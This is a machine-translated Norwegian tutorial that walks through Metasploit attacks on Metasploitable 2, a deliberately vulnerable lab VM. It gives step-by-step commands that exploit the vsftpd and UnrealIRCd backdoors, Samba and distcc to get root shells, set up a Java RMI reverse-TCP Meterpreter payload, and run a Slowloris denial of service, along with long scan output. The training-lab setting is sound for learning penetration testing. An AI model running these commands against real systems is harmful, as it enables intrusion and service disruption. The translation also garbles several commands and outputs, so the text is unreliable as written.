Topp 10 metasploit -brukseksempler

Topp 10 metasploit -brukseksempler
Metasploit er et sikkerhetsrammeverk som følger med mange verktøy for systemutnyttelse og testing av systemer. Denne opplæringen viser 10 eksempler på hackingangrep mot et Linux -mål. Linux -målet er et treningsmiljø Metasploitable 2 OS, med vilje sårbar for brukere å lære å utnytte sine sårbarheter. Denne opplæringen fokuserer bare på 10 spesifikke metasploitangrep, for informasjon om Metasploitable 2 -installasjon Les mer her.For å begynne å laste ned Metasploit.

I mitt tilfelle har jeg lastet ned Metasploit Pro Free Trial, men du kan få noen av dem.
Følgende skjermbilde krever noe av din personlige informasjon, fyller den for å gå til nedlastingssiden:

Last ned Metasploit for Linux:

Gi installasjonsprogrammet du nettopp lastet ned utførelsesrettigheter ved å kjøre:

# CHMOD +X Metasploit-Latest-Linux-X64-Installer.løpe

Utfør deretter Metasploit ved å løpe:

# ./Metasploit-Latest-Linux-X64-installerer.løpe

Når du ser et installasjonsgui -spørsmål, klikker du på Framover å fortsette:

I neste skjermbilde godta lisensavtalen og klikk på Framover:

Legg igjen standardkatalogen og trykk Framover:

På spørsmål om å installere Metasploit som tjeneste anbefalingen ikke er, hvis du gjør det, vil Metasploit -tjenesten starte hver gang du starter, hvis du trykker på Nei Metasploit -tjenesten vil bare bli lansert på forespørsel. Velg ditt valg og trykk videre for å fortsette:

For å unngå forstyrrelser, når du bruker Metasploit, slå av brannmuren, trykk Framover å fortsette:

Med mindre den viste porten allerede er brukt, trykk Framover å fortsette:

Forlat Localhost og trykk Framover å fortsette:

For å fortsette med installasjonspressen Framover For siste gang:

Installasjonsprosessen begynner:

Til slutt ble Metasploit installert, til tross for at vi ikke kommer til å jobbe med Metasploit webgrensesnitt, kan du merke det for å holde det tilgjengelig. trykk Bli ferdig å ende.

Feilsøking Metasploit DB -feil:

I mitt tilfelle da jeg lanserte Metasploit, returnerte den feilen:

 Ingen databasestøtte: Kunne ikke koble til serveren: Tilkobling nektet er serveren som kjører på verten "localhost" (:: 1) og aksepterer TCP/IP -tilkoblinger på port 7337? 

Årsaken til denne feilen er at avhengigheten PostgreSQL ikke ble installert og Metasploit -tjenesten heller.

For å løse det løp:

# Apt Install -y PostgreSql

Start deretter PostgreSQL ved å løpe:

# sudo service postgreSql start

Og til slutt start Metasploit -tjenesten:

# sudo service metasploit start

Nå løp MSFConsole Igjen, og du vil merke at feilen forsvant, og vi er klare til å angripe Metasploitable 2:

Bruke Metasploit for å skanne et mål for sårbarheter:

Det første trinnet er å skanne vårt mål for å oppdage tjenester og sårbarheter på det. For å oppnå det vil vi bruke NMAP fra Metasploit og dets NSE (NMAP Scripting Engine) vuln skript som brukes til å oppdage sårbarheter:

# db_nmap -v --cript vuln 192.168.0.184

MERK: erstatte 192.168.0.184 for din mål -IP -adresse eller vert.

La oss analysere NMAPs utdata:

VIKTIG: NMAP -utgangen inneholdt over 4000 linjer, derfor ble utgangen forkortet og etterlot relevant informasjon som skulle forklares.

Følgende linjer viser oss bare de initialiserte typene skanninger som involverer NSE, ARP Ping -skanning, DNS -oppløsning og en Syn Stealth -skanning. Alle disse trinnene ble allerede tydelig forklart på Linuxhint.com at nping og nmap arp scan, ved hjelp av nmap -skript og nmap stealth scan.

Merk at NSE inneholder forhåndsutøvelse, under utførelse av skanner og etter-utførelse som kjøres før, under og etter skanneprosessen starter og slutter.

 MSF5> db_nmap -v --cript vuln 192.168.0.184 [*] NMAP: Start NMAP 7.70 (https: // nmap.org) kl. 2020-02-04 16:56 -03 [*] NMAP: NSE: Lastet 103 skript for skanning. [*] NMAP: NSE: Skanning Pre-Scanning. [*] NMAP: Initierer NSE på 16:56 [*] NMAP: Fullført NSE på 16:57, 10.00 -tallet gikk.00 -tallet gikk.168.0.184 [1 Port] [*] NMAP: Fullført ARP Ping -skanning på 16:57, 0.05s forløp (1 totale verter) [*] NMAP: Initiering av parallell DNS -oppløsning av 1 vert. kl 16:57 [*] NMAP: Fullført parallell DNS -oppløsning av 1 vert. kl 16:57, 0.02s gikk [*] NMAP: Initiating Syn Stealth Scan på 16:57 [*] NMAP: Skanning 192.168.0.184 [1000 porter] 

Neste utdrag viser hvilke tjenester som er tilgjengelige på vårt mål:

 [*] NMAP: oppdaget Open Port 25/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 80/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 445/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 139/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 3306/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 5900/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 22/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 53/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 111/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 21/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 23/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 1099/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 512/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 1524/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 513/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 514/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 2121/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 6000/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 2049/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 6667/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 8009/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 5432/TCP på 192.168.0.184 [*] NMAP: Discovered Open Port 8180/TCP på 192.168.0.184 [*] NMAP: Fullført Syn Stealth Scan på 16:57, 0.12 -tallet går (1000 totalt porter) 

Følgende Extract Report NSE Post Scan -skript Utførelse for å finne sårbarheter:

 [*] NMAP: NSE: Skanning 192.168.0.184. [*] NMAP: Initierer NSE på 16:57 [*] NMAP: Fullført NSE kl 17:02, 322.44s gikk [*] NMAP: Initating NSE kl 17:02 [*] NMAP: Fullført NSE kl 17:02, 0.74s gikk [*] NMAP: NMAP Scan Report for 192.168.0.184 [*] NMAP: Verten er oppe (0.00075 -latens). [*] NMAP: Ikke vist: 977 lukkede porter 

Som du kan se, fant NMAP allerede sikkerhetshull eller sårbarheter på Target FTP -tjenesten, den kobler til og med oss ​​utnyttelser for å hacke målet:

 [*] NMAP: Port State Service [*] NMAP: 21/TCP Open FTP [*] NMAP: | ftp-vsftpd-backdoor: [*] nmap: | Sårbar: [*] NMAP: | VSFTPD versjon 2.3.4 Bakdør [*] NMAP: | Stat: Sårbar (utnyttbar) [*] NMAP: | IDS: OSVDB: 73573 CVE: CVE-2011-2523 [*] NMAP: | VSFTPD versjon 2.3.4 Bakdør, dette ble rapportert 2011-07-04. [*] NMAP: | Avsløringsdato: 2011-07-03 [*] NMAP: | Utnytte resultater: [*] nmap: | Shell -kommando: ID [*] NMAP: | Resultater: uid = 0 (rot) gid = 0 (rot) [*] nmap: | Referanser: [*] NMAP: | http: // scarybeastsecurity.Blogspot.com/2011/07/Alert-vsftpd-download-backDoored.html [*] nmap: | http: // osvdb.org/73573 [*] nmap: | https: // github.com/rapid7/metasploit-rammework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb [*] nmap: | _ https: // cve.MITER.org/cgi-bin/cvename.CGI?Navn = CVE-2011-2523 

Nedenfor kan du se, i tillegg til FTP -sikkerhetshull, NMAP oppdaget SSL -sårbarheter:

[*] NMAP: | _SSLV2-DROWN: [*] NMAP: 22/TCP Open SSH [*] NMAP: 23/TCP Open Telnet [*] NMAP: 25/TCP Open SMTP [*] NMAP: | SMTP-VULN-CVE2010-4344: [*] NMAP: | _ SMTP-serveren er ikke exim: ikke sårbar [*] NMAP: | ssl-dh-params: [*] nmap: | Sårbar: [*] NMAP: | Anonym Diffie-Hellman Key Exchange MITM Sårbarhet [*] NMAP: | Stat: Sårbar [*] NMAP: | Transport Layer Security (TLS) -tjenester som bruker anonyme [*] NMAP: | Diffie-Hellman Key Exchange gir bare beskyttelse mot passiv [*] NMAP: | Avlytter, og er sårbare for aktive mann-i-midt-angrep [*] NMAP: | som fullstendig kan kompromittere konfidensialiteten og integriteten [*] NMAP: | av noen data som er utvekslet over den resulterende økten. [*] NMAP: | Sjekk resultatene: [*] NMAP: | Anonym DH -gruppe 1 [*] NMAP: | Cipher Suite: TLS_DH_ANON_WITH_AES_256_CBC_SHA [*] NMAP: | Modulus Type: Safe Prime [*] NMAP: | Modulus Kilde: Postfix Builtin [*] NMAP: | Modullengde: 1024 [*] NMAP: | Generatorlengde: 8 [*] NMAP: | Offentlig nøkkellengde: 1024 [*] NMAP: | Referanser: [*] NMAP: | https: // www.ietf.org/rfc/rfc2246.txt [*] nmap: | [*] NMAP: | Transport Layer Security (TLS) Protocol DHE_Export Ciphers Downgrade MITM (Logjam) [*] NMAP: | Stat: Sårbar [*] NMAP: | IDS: OSVDB: 122331 CVE: CVE-2015-4000 [*] NMAP: | Protokollen Transport Layer Security (TLS) inneholder en feil som er [*] NMAP: | Utløses når du håndterer Diffie-Hellman-nøkkelutvekslinger definert med [*] NMAP: | DHE_EXPORT CIPHER. Dette kan tillate en mann-i-Middle-angriper [*] NMAP: | For å nedgradere sikkerheten til en TLS-økt til 512-biters eksportklasse [*] NMAP: | Kryptografi, som er betydelig svakere, slik at angriperen [*] NMAP: | For å lettere bryte krypteringen og overvåke eller tukle med [*] NMAP: | den krypterte strømmen. [*] NMAP: | Avsløringsdato: 2015-5-19 [*] NMAP: | Sjekk resultatene: [*] NMAP: | Eksportklasse DH Group 1 [*] NMAP: | Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA [*] NMAP: | Modulus Type: Safe Prime [*] NMAP: | Modulus Kilde: Ukjent/Tilpasset generert [*] NMAP: | Modullengde: 512 [*] NMAP: | Generatorlengde: 8 [*] NMAP: | Offentlig nøkkellengde: 512 [*] NMAP: | Referanser: [*] NMAP: | https: // svak.org [*] nmap: | http: // osvdb.org/122331 [*] nmap: | https: // cve.MITER.org/cgi-bin/cvename.CGI?Navn = CVE-2015-4000 [*] NMAP: | [*] NMAP: | Diffie-Hellman Key Exchange Utilstrekkelig gruppestyrke [*] NMAP: | Stat: Sårbar [*] NMAP: | Transport Layer Security (TLS) -tjenester som bruker Diffie-Hellman-grupper [*] NMAP: | av utilstrekkelig styrke, spesielt de som bruker en av noen få ofte [*] nmap: | Delte grupper, kan være utsatt for passive avlyttingsangrep. [*] NMAP: | Sjekk resultatene: [*] NMAP: | Svak DH -gruppe 1 [*] NMAP: | Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA [*] NMAP: | Modulus Type: Safe Prime [*] NMAP: | Modulus Kilde: Postfix Builtin [*] NMAP: | Modullengde: 1024 [*] NMAP: | Generatorlengde: 8 [*] NMAP: | Offentlig nøkkellengde: 1024 [*] NMAP: | Referanser: [*] NMAP: | _ https: // svak.org [*] nmap: | SSL-Poodle: [*] NMAP: | Sårbar: [*] NMAP: | SSL Poodle Information Leak [*] NMAP: | Stat: Sårbar [*] NMAP: | IDS: OSVDB: 113251 CVE: CVE-2014-3566 [*] NMAP: | SSL -protokollen 3.0, som brukt i OpenSSL gjennom 1.0.1i og andre [*] nmap: | Produkter, bruker nondeterministisk CBC -polstring, noe som gjør det enklere [*] NMAP: | For man-i-The-Middle-angripere for å få klartekstdata via en [*] NMAP: | Padding-Oracle Attack, aka "Poodle" -utgaven. [*] NMAP: | Avsløringsdato: 2014-10-14 [*] NMAP: | Sjekk resultatene: [*] NMAP: | Tls_rsa_with_aes_128_cbc_sha [*] nmap: | Referanser: [*] NMAP: | https: // cve.MITER.org/cgi-bin/cvename.CGI?Navn = CVE-2014-3566 [*] NMAP: | https: // www.OpenSSL.org/~ bodo/ssl-pudle.PDF [*] NMAP: | https: // www.Imperialviolet.org/2014/10/14/puddel.html [*] nmap: | _ http: // osvdb.org/113251 [*] nmap: | SSLV2-DROWN: [*] NMAP: | Ciphers: [*] NMAP: | Ssl2_rc4_128_export40_with_md5 [*] nmap: | SSL2_DES_192_EDE3_CBC_WITH_MD5 [*] NMAP: | Ssl2_rc2_128_cbc_with_md5 [*] nmap: | Ssl2_rc2_128_cbc_export40_with_md5 [*] nmap: | Ssl2_rc4_128_with_md5 [*] nmap: | Ssl2_des_64_cbc_with_md5 [*] nmap: | Vulns: [*] NMAP: | CVE-2016-0703: [*] NMAP: | Tittel: OpenSSL: Divide-and-Conquer Session Key Recovery in SSLV2 [*] NMAP: | Stat: Sårbar [*] NMAP: | IDS: [*] NMAP: | CVE: CVE-2016-0703 [*] NMAP: | Beskrivelse: [*] NMAP: | Get_client_master_key -funksjonen i s2_srvr.C i SSLV2 -implementeringen i [*] NMAP: | Openenssl før 0.9.8ZF, 1.0.0 før 1.0.0r, 1.0.1 før 1.0.1m, og 1.0.2 før [*] NMAP: | 1.0.2A godtar en ikke-null klient-master-nøkkel-klare lengdeverdi for en vilkårlig [*] NMAP: | Cipher, som lar mann-i-midten angripere bestemme master-nøkkelverdien [*] NMAP: | og dekryptere TLS Ciphertext -data ved å utnytte en Bleichenbacher RSA -polstring Oracle, A [*] NMAP: | Relatert problem med CVE-2016-0800. [*] NMAP: | [*] NMAP: | REFS: [*] NMAP: | https: // cve.MITER.org/cgi-bin/cvename.CGI?Navn = CVE-2016-0703 [*] NMAP: | https: // www.OpenSSL.ORG/NYHETER/SECADV/20160301.tekst 

Følgende utdrag viser at mange sårbarheter ble funnet på webserveren, inkludert tilgang til fornuftige påloggingssider og fornektelse av tjenestesårbarheter.

 [*] NMAP: 53/TCP Open Domain [*] NMAP: 80/TCP Open HTTP [*] NMAP: | http-csrf: [*] nmap: | Spidering Limited til: MaxDepth = 3; MaxPageCount = 20; Innehost = 192.168.0.184 [*] nmap: | Fant følgende mulige CSRF -sårbarheter: [*] NMAP: | [*] NMAP: | Sti: http: // 192.168.0.184: 80/ dvwa/ [*] nmap: | Form ID: [*] NMAP: | Formhandling: pålogging.php [*] nmap: | [*] NMAP: | Sti: http: // 192.168.0.184: 80/dvwa/pålogging.php [*] nmap: | Form ID: [*] Nmap: | _ Form Handling: Innlogging.php [*] nmap: | _http-dombased-xss: kunne ikke finne noen DOM-baserte XSS. [*] NMAP: | http-enum: [*] nmap: | /tikiwiki/: tikiwiki [*] nmap: | /Test/: Testside [*] NMAP: | /phpinfo.PHP: Mulig informasjonsfil [*] NMAP: | /phpmyadmin/: phpmyadmin [*] nmap: | /doc/: potensielt interessant katalog m/oppføring på 'Apache/2.2.8 (Ubuntu) Dav/2 '[*] NMAP: | /ikoner/: Potensielt interessant mappe m/katalogoppføring [*] NMAP: | _/INDEX/: Potensielt interessant mappe [*] NMAP: | http-slowloris-check: [*] nmap: | Sårbar: [*] NMAP: | Slowloris dos Attack [*] NMAP: | Stat: Sannsynligvis sårbar [*] NMAP: | IDS: CVE: CVE-2007-6750 [*] NMAP: | Slowloris prøver å holde mange tilkoblinger til Target Web Server åpen og hold [*] NMAP: | dem åpner så lenge som mulig. Det oppnår dette ved å åpne tilkoblinger til [*] NMAP: | Target webserveren og sender en delvis forespørsel. Ved å gjøre det sulter det [*] NMAP: | HTTP -serverens ressurser forårsaker benektelse av tjenesten. [*] NMAP: | [*] NMAP: | Avsløringsdato: 2009-09-17 [*] NMAP: | Referanser: [*] NMAP: | http: // ha.Ckers.org/slowloris/[*] nmap: | _ https: // cve.MITER.org/cgi-bin/cvename.CGI?Navn = CVE-2007-6750 

På dette stadiet fant NMAP mange SQL -injeksjonssårbarheter, mengden av sårbarheter var så stor for denne opplæringen at jeg fjernet mange av dem og la igjen noen:

 [*] NMAP: | http-sql-injeksjon: [*] nmap: | Mulig SQLI for spørsmål: [*] NMAP: | http: // 192.168.0.184: 80/dav/?C = N%3BO%3DD%27%20 eller 20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/dav/?C = S%3BO%3DA%27%20 eller 20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/dav/?C = M%3BO%3DA%27%20 eller 20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/dav/?C = D%3BO%3DA%27%20 eller 20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/mutillidae/indeks.PHP?Side = Pen-test-tool-lookup.PHP%27%20or%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/mutillidae/indeks.PHP?Side = dokumentasjon%2Fvulnerabilities.PHP%27%20or%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/mutillidae/indeks.PHP?Side = Capture-Data.PHP%27%20or%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/mutillidae/indeks.PHP?Side = tekst-fil-viewer.PHP%27%20or%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/?side = add-to-your-blog.PHP%27%20or%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Mutillidae/?side = show-log.PHP%27%20or%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/mutillidae/indeks.PHP?Side = Registrer deg.PHP%27%20or%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/mutillidae/indeks.PHP?Side = HTML5-lagring.PHP%27%20or%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/mutillidae/indeks.PHP?side = bruker-info.PHP%27%20or%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/mutillidae/indeks.PHP?side = hjem.PHP & DO = Toggle-Hints%27%20or%20SqlSpider [*] NMAP: | http: // 192.168.0.184: 80/mutillidae/indeks.PHP?side = show-log.PHP%27%20or%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/mutillidae/indeks.PHP?side = notater.PHP%27%20or%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/mutillidae/indeks.PHP?side = innramming.PHP%27%20or%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/mutillidae/indeks.PHP?Side = PHP-feil.PHP%27%20or%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/mutillidae/indeks.PHP?side = hjem.PHP & DO = Toggle-Security%27%20or%20SqlSpider 

Under NMAP kaster XSS -sårbarheter igjen (som i det første utdraget), og rapporterer

Remote Method Invocation (RMI) Sikkerhetshull på grunn av feil konfigurasjon slik at en angriper kan tillate ondsinnet Java -kodeutførelse:

 [*] NMAP: | _HTTP-lagret-XSS: Kan ikke finne noen lagrede XSS-sårbarheter. [*] Nmap: | _Http-Trace: Trace er aktivert [*] NMAP: | _HTTP-VULN-CVE2017-1001000: Feil: Skriptutførelse mislykket (bruk -d til feilsøking) [*] NMAP: 111/TCP Open RPCBIND [ *] NMAP: 139/TCP Open NetBios-SSN [*] NMAP: 445/TCP Open Microsoft-Ds [*] NMAP: 512/TCP Open Exec [*] NMAP: 513/TCP Åpne pålogging [*] NMAP: 514/ TCP Open Shell [*] NMAP: 1099/TCP Open Rmiregistry [*] NMAP: | RMI-Vuln-ClassLoader: [*] NMAP: | Sårbar: [*] NMAP: | RMI Registry Standardkonfigurasjon Remote Code Execution Sårbarhet [*] NMAP: | Stat: Sårbar [*] NMAP: | Standardkonfigurasjon av RMI -registeret tillater lastingsklasser fra eksterne URL -er som kan føre til ekstern kodeutførelse. [*] NMAP: | [*] NMAP: | Referanser: [*] Nmap: | _ https: // github.com/rapid7/metasploit-rammework/blob/master/modules/exploits/multi/misc/java_rmi_server.RB 

Nedenfor kan du se at ytterligere SSL -sårbarheter ble funnet:

 [*] NMAP: | SSL-CCS-injeksjon: [*] NMAP: | Sårbar: [*] NMAP: | SSL/TLS MITM Sårbarhet (CCS -injeksjon) [*] NMAP: | Stat: Sårbar [*] NMAP: | Risikofaktor: Høy [*] NMAP: | Openenssl før 0.9.8za, 1.0.0 før 1.0.0m, og 1.0.1 før 1.0.1H [*] NMAP: | begrenser ikke behandlingen av ChangeCipherspec -meldinger, [*] NMAP: | som lar mann-i-midten angripere utløse bruk av en null [*] nmap: | Lengde masternøkkel i visse OpenSSL-til-OPENSSL-kommunikasjon, og [*] NMAP: | Følgelig kapre økter eller innhente sensitiv informasjon, via [*] NMAP: | Et laget TLS -håndtrykk, også kalt "CCS Injection" -sårbarheten. [*] NMAP: | [*] NMAP: | Referanser: [*] NMAP: | https: // cve.MITER.org/cgi-bin/cvename.CGI?Navn = CVE-2014-0224 [*] NMAP: | http: // www.Cvedetails.com/cve/2014-0224 [*] nmap: | _ http: // www.OpenSSL.ORG/NYHETER/SECADV_20140605.txt [*] nmap: | ssl-dh-params: [*] nmap: | Sårbar: [*] NMAP: | Diffie-Hellman Key Exchange Utilstrekkelig gruppestyrke [*] NMAP: | Stat: Sårbar [*] NMAP: | Transport Layer Security (TLS) -tjenester som bruker Diffie-Hellman-grupper [*] NMAP: | av utilstrekkelig styrke, spesielt de som bruker en av noen få ofte [*] nmap: | Delte grupper, kan være utsatt for passive avlyttingsangrep. [*] NMAP: | Sjekk resultatene: [*] NMAP: | Svak DH -gruppe 1 [*] NMAP: | Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA [*] NMAP: | Modulus Type: Safe Prime [*] NMAP: | Modulus Kilde: Ukjent/Tilpasset generert [*] NMAP: | Modullengde: 1024 [*] NMAP: | Generatorlengde: 8 [*] NMAP: | Offentlig nøkkellengde: 1024 [*] NMAP: | Referanser: [*] NMAP: | _ https: // svak.org [*] nmap: | SSL-Poodle: [*] NMAP: | Sårbar: [*] NMAP: | SSL Poodle Information Leak [*] NMAP: | Stat: Sårbar [*] NMAP: | IDS: OSVDB: 113251 CVE: CVE-2014-3566 [*] NMAP: | SSL -protokollen 3.0, som brukt i OpenSSL gjennom 1.0.1i og annet 

Neste utdrag viser at vårt mål muligens er smittet med en trojan mot en IRC -tjeneste:

 [*] Nmap: | _irc-unrealircd-backdoor: ser ut som trojanet versjon av Unrealircd. Se http: // sekkistene.org/fulldisclosure/2010/juni/277 [*] NMAP: 8009/TCP Åpne AJP13 

Følgende utdrag viser at Httponly-flagget ikke er riktig konfigurert, derfor er målet sårbart for skriptangrep på tvers av nettsteder:

 [*] NMAP: 8180/TCP Open Ukjent [*] NMAP: | http-cookie-flagg: [*] nmap: | /admin/: [*] nmap: | JSessionId: [*] NMAP: | httponly flagg ikke sett [*] nmap: | /admin/indeks.html: [*] nmap: | JSessionId: [*] NMAP: | httponly flagg ikke sett [*] nmap: | /admin/pålogging.html: [*] nmap: | JSessionId: [*] NMAP: | httponly flagg ikke sett [*] nmap: | /admin/admin.html: [*] nmap: | JSessionId: [*] NMAP: | httponly flagg ikke sett [*] nmap: | /admin/konto.html: [*] nmap: | JSessionId: [*] NMAP: | httponly flagg ikke sett [*] nmap: | /admin/admin_login.html: [*] nmap: | JSessionId: [*] NMAP: | httponly flagg ikke sett [*] nmap: | /admin/hjemme.html: 

Følgende utdrag oppregner eller viser interessante funnet tilgjengelige kataloger på vårt mål:

 [*] NMAP: | http-enum: [*] nmap: | /admin/: mulig admin -mappe [*] nmap: | /admin/indeks.HTML: Mulig admin -mappe [*] NMAP: | /admin/pålogging.HTML: Mulig admin -mappe [*] NMAP: | /admin/admin.HTML: Mulig admin -mappe [*] NMAP: | /admin/konto.HTML: Mulig admin -mappe [*] NMAP: | /admin/admin_login.HTML: Mulig admin -mappe [*] NMAP: | /admin/hjemme.HTML: Mulig admin -mappe [*] NMAP: | /admin/admin-login.HTML: Mulig admin -mappe [*] NMAP: | /admin/adminlogin.HTML: Mulig admin -mappe [*] NMAP: | /admin/controlpanel.HTML: Mulig admin -mappe [*] NMAP: | /admin/cp.HTML: Mulig admin -mappe [*] NMAP: | /admin/indeks.JSP: Mulig administratormappe 

Til slutt ender skanningen og NSE etter skanning utføres:

 [*] NMAP: | [*] NMAP: | Avsløringsdato: 2009-09-17 [*] NMAP: | Referanser: [*] NMAP: | http: // ha.Ckers.org/slowloris/[*] nmap: | _ https: // cve.MITER.org/cgi-bin/cvename.CGI?Navn = CVE-2007-6750 [*] NMAP: MAC-adresse: 08: 00: 27: DD: 87: 8c (Oracle VirtualBox Virtual Nic) [*] NMAP: Vertsskriptresultater: [*] NMAP: | _SMB-VULN -m10-054: falsk [*] nmap: | _SMB-VULN-MS10-061: FALSE [*] NMAP: NSE: Script Post-Scanning. [*] NMAP: Initierer NSE kl 17:02 [*] NMAP: Fullført NSE kl 17:02, 0.00 -tallet gikk.00S forløpet [*] NMAP: Les datafiler fra:/opt/metasploit/common/share/nmap/[*] nmap: nmap gjort: 1 ip adresse (1 host up) skannet i 333.96 sekunder [*] NMAP: råpakker sendt: 1001 (44.028KB) | RCVD: 1001 (40.120kb) MSF5> 

Nå har vi identifisert noen sikkerhetshull for å angripe målet vårt.

Bruke Metasploit for å hacke en FTP -server:

Når du identifiserte sikkerhetshull på målbruk, bruk metasploit -kommandoer for å finne riktig utnyttelse mot dem. Som du tidligere så en av de første sårbarhetene som ble funnet, var på VSFTPD -serveren, for å finne riktig utnyttelse, innen Metasploit Run:

# Søk VSFTPD

Som du ser at Metasploit inneholder en bakdør som muligens kan hjelpe oss med å hacke målet vårt FTP. For å bruke denne utnyttelsen, innen Metasploit Run:

# Bruk utnyttelse/UNIX/FTP/VSFTPD_234_backdoor

For å lære hvordan du bruker en spesifikk utnyttelsesløp:

# Vis alternativer

Som du ser ovenfor, inneholder denne utnyttelsen 2 alternativer, Rhosts (ekstern vert) og RPORT. Vi må spesifisere rhost, porten er allerede spesifisert (21).
For å angi den eksterne verten (RHOST) som definerer målet IP -kjøringen:

# sett Rhost 192.168.0.184

En gang definert målet Kjør følgende kommando for å utnytte sikkerhetshullet:

# utnyttelse

Som du kunne se, fikk jeg et skall inn i målet, når jeg kjører "LS", kan jeg se målfilene, angrepet lyktes. For å la målet bare løpe:

#exit

Bruke Metasploit for DOS -angrep:

Som du så under skanneprosessen, ble det funnet en DOS Slowloris -sårbarhet, for å finne hvordan du utnytter den følger de tidligere trinnene for å søke etter et riktig verktøy, i dette tilfellet en tilleggsmodul i stedet for en utnyttelse:

# Søk sakte

Når vi fant et verktøy å angripe, løp:

# Bruk hjelpe/DOS/HTTP/Slowloris
# sett Rhost 192.168.0.184

Så bare skriv:

# løpe

Du vil merke at mens angrepet går, vil målet HTTP -tjenesten ikke være tilgjengelig, det holder lasting:

Når vi stopper angrepet ved å presse Ctrl+C Serveren vil være tilgjengelig igjen:

Bruke Metasploit for å hacke en IRC -server:

Internett -stafettchat er mye brukt over hele verden, som du kan legge merke til i løpet av de første stadiene av skanningsmetasploit muligens en IRC (Unreal IRCD) -tjeneste infisert med en trojan.

La oss gjenta trinnene for å finne et verktøy for å hacke det:

# søk unreal ircd
# Bruk utnyttelse/unix/irc/unreal_ircd_3281_backdoor
# Vis alternativer
# sett Rhost 192.168.0.184

Løp deretter:

# utnyttelse

Og som du kan se igjen, har vi en skalløkt innen målet.

Bruke Metasploit for å utføre Java ondsinnet kode:

# Bruk utnyttelse/multi/misc/java_rmi_server
# Vis alternativer
# sett Rhost 192.168.0.184
# Vis nyttelast
# Angi nyttelast Java/Meterpreter/Reverse_TCP
# sett Lhost 192.168.0.50
# utnyttelse

Bruke Metasploit for å hacke gjennom SAMBA UserMap Script -sårbarhet:

Noen trinn som utnyttelse av søk vil bli utelatt for å unngå en enorm tutorial. For å utnytte dette sårbarhetskjøringen:

# Bruk utnyttelse/multi/samba/usermap_script
# Vis alternativer

Angi målet IP og utnytt den ved å kjøre:

# sett Rhost 192.168.0.184
# utnyttelse

Som du ser fikk vi et skall i målet vårt.

Bruke Metasploit for å utnytte Distcc Daemon Command Execution:

Denne sårbarheten er forklart her.

Å begynne å løpe:

# Bruk utnyttelse/UNIX/MISC/DISTCC_EXEC

Løp deretter:

# sett Rhost 192.168.0.184
# utnyttelse

Som du kan se, fikk vi tilgang til målet igjen.

Bruke Metasploit for portskanning (ekstra måte uten NMAP):

Gjennomføre en TCP -skanning med Metasploit:

For å kjøre en annen skanning uten å bruke NMAP Metasploit tilbyr alternativ du kan finne ved å kjøre:

# Søk Portscan

Å gjøre en TCP -skanneløp:

# Bruk skanner/Portscan/TCP
# sett Rhost 192.168.0.184

For å se flere alternativer:

# Vis alternativer

Velg portområdet du vil skanne ved å kjøre:

# Angi porter 21-35

Kjør deretter skanningen ved å utføre:

# løpe

Som du kan se porter ble 22,25,23 og 21 funnet åpne.

Å utføre en SYN -skanning med Metasploit:

For en Syn Scan Run:

# Bruk hjelpe/skanner/Portscan/Syn
# sett Rhost 192.168.0.184
# Angi porter 80
# løpe

Som du kan se at port 80 ble funnet åpen.

KONKLUSJON

Metasploit er som en sveitsisk hærkniv den har så mange funksjoner. Jeg håper du fant denne opplæringen ingen metasploit nyttig. Fortsett å følge Linuxhint for flere tips og oppdateringer om Linux og nettverksbygging.